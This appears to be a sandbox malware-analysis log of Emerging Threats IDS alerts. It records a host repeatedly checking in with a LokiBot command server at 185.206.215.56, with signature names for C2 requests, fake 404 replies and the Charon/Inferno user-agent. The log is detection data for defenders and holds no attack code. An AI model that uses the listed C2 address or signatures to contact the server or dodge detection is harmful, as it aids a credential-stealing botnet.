                                                                                        01/05/21-19:06:36.491085TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.491085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.657367TCP2025483ET TROJAN LokiBot Fake 404 Response8049240185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:36.879808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.879808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.879808TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.879808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.043514TCP2025483ET TROJAN LokiBot Fake 404 Response8049241185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:37.256017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.256017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.256017TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.256017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.425204TCP2025483ET TROJAN LokiBot Fake 404 Response8049242185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:37.635343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.635343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.635343TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.635343TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.804227TCP2025483ET TROJAN LokiBot Fake 404 Response8049243185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:38.018241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.018241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.018241TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.018241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.186781TCP2025483ET TROJAN LokiBot Fake 404 Response8049244185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:38.389239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.389239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.389239TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.389239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.563167TCP2025483ET TROJAN LokiBot Fake 404 Response8049245185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:38.784644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.784644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.784644TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.784644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.965108TCP2025483ET TROJAN LokiBot Fake 404 Response8049246185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.177876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.177876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.177876TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.177876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.331864TCP2025483ET TROJAN LokiBot Fake 404 Response8049247185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.554968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.738314TCP2025483ET TROJAN LokiBot Fake 404 Response8049248185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.944185TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.121556TCP2025483ET TROJAN LokiBot Fake 404 Response8049249185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:40.335810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.507894TCP2025483ET TROJAN LokiBot Fake 404 Response8049250185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:40.714092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2025381ET TROJAN LokiBot Checkin4925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.893523TCP2025483ET TROJAN LokiBot Fake 404 Response8049251185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.109834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2025381ET TROJAN LokiBot Checkin4925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.281018TCP2025483ET TROJAN LokiBot Fake 404 Response8049252185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.488492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2025381ET TROJAN LokiBot Checkin4925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.665959TCP2025483ET TROJAN LokiBot Fake 404 Response8049253185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.875312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2025381ET TROJAN LokiBot Checkin4925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.043815TCP2025483ET TROJAN LokiBot Fake 404 Response8049254185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:42.266645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2025381ET TROJAN LokiBot Checkin4925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.432654TCP2025483ET TROJAN LokiBot Fake 404 Response8049255185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:42.638995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2025381ET TROJAN LokiBot Checkin4925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.805691TCP2025483ET TROJAN LokiBot Fake 404 Response8049256185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.011253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2025381ET TROJAN LokiBot Checkin4925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.168522TCP2025483ET TROJAN LokiBot Fake 404 Response8049257185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.372296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2025381ET TROJAN LokiBot Checkin4925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.526493TCP2025483ET TROJAN LokiBot Fake 404 Response8049258185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.756835TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2025381ET TROJAN LokiBot Checkin4925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.913405TCP2025483ET TROJAN LokiBot Fake 404 Response8049259185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.120266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2025381ET TROJAN LokiBot Checkin4926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.276026TCP2025483ET TROJAN LokiBot Fake 404 Response8049260185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.485788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2025381ET TROJAN LokiBot Checkin4926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.652260TCP2025483ET TROJAN LokiBot Fake 404 Response8049261185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.876902TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2025381ET TROJAN LokiBot Checkin4926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.053688TCP2025483ET TROJAN LokiBot Fake 404 Response8049262185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.261637TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2025381ET TROJAN LokiBot Checkin4926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.422623TCP2025483ET TROJAN LokiBot Fake 404 Response8049263185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.633934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2025381ET TROJAN LokiBot Checkin4926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.789961TCP2025483ET TROJAN LokiBot Fake 404 Response8049264185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.996354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2025381ET TROJAN LokiBot Checkin4926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.162508TCP2025483ET TROJAN LokiBot Fake 404 Response8049265185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:46.366773TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2025381ET TROJAN LokiBot Checkin4926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.523351TCP2025483ET TROJAN LokiBot Fake 404 Response8049266185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:46.730742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2025381ET TROJAN LokiBot Checkin4926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.897287TCP2025483ET TROJAN LokiBot Fake 404 Response8049267185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.102635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2025381ET TROJAN LokiBot Checkin4926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.257102TCP2025483ET TROJAN LokiBot Fake 404 Response8049268185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.475682TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2025381ET TROJAN LokiBot Checkin4926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.647987TCP2025483ET TROJAN LokiBot Fake 404 Response8049269185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.867741TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2025381ET TROJAN LokiBot Checkin4927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.042229TCP2025483ET TROJAN LokiBot Fake 404 Response8049270185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:48.254686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2025381ET TROJAN LokiBot Checkin4927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.422139TCP2025483ET TROJAN LokiBot Fake 404 Response8049271185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:48.626007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2025381ET TROJAN LokiBot Checkin4927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.788675TCP2025483ET TROJAN LokiBot Fake 404 Response8049272185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.009732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2025381ET TROJAN LokiBot Checkin4927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.170301TCP2025483ET TROJAN LokiBot Fake 404 Response8049273185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.377604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2025381ET TROJAN LokiBot Checkin4927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.549512TCP2025483ET TROJAN LokiBot Fake 404 Response8049274185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.748267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2025381ET TROJAN LokiBot Checkin4927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.910769TCP2025483ET TROJAN LokiBot Fake 404 Response8049275185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:50.119352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.119352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.119352TCP2025381ET TROJAN LokiBot Checkin4927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.119352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.275711TCP2025483ET TROJAN LokiBot Fake 404 Response8049276185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:50.486914TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.486914TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.486914TCP2025381ET TROJAN LokiBot Checkin4927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.486914TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.662352TCP2025483ET TROJAN LokiBot Fake 404 Response8049277185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:50.870071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.870071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.870071TCP2025381ET TROJAN LokiBot Checkin4927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.870071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.028077TCP2025483ET TROJAN LokiBot Fake 404 Response8049278185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:51.234373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.234373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.234373TCP2025381ET TROJAN LokiBot Checkin4927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.234373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.393173TCP2025483ET TROJAN LokiBot Fake 404 Response8049279185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:51.603753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.603753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.603753TCP2025381ET TROJAN LokiBot Checkin4928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.603753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.756889TCP2025483ET TROJAN LokiBot Fake 404 Response8049280185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:51.974612TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.974612TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.974612TCP2025381ET TROJAN LokiBot Checkin4928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.974612TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.147882TCP2025483ET TROJAN LokiBot Fake 404 Response8049281185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:52.356383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.356383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.356383TCP2025381ET TROJAN LokiBot Checkin4928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.356383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.526790TCP2025483ET TROJAN LokiBot Fake 404 Response8049282185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:52.728532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.728532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.728532TCP2025381ET TROJAN LokiBot Checkin4928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.728532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.923052TCP2025483ET TROJAN LokiBot Fake 404 Response8049283185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:53.137321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.137321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.137321TCP2025381ET TROJAN LokiBot Checkin4928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.137321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.310694TCP2025483ET TROJAN LokiBot Fake 404 Response8049284185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:53.527158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.527158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928580192.168.2.22185.206.215.56
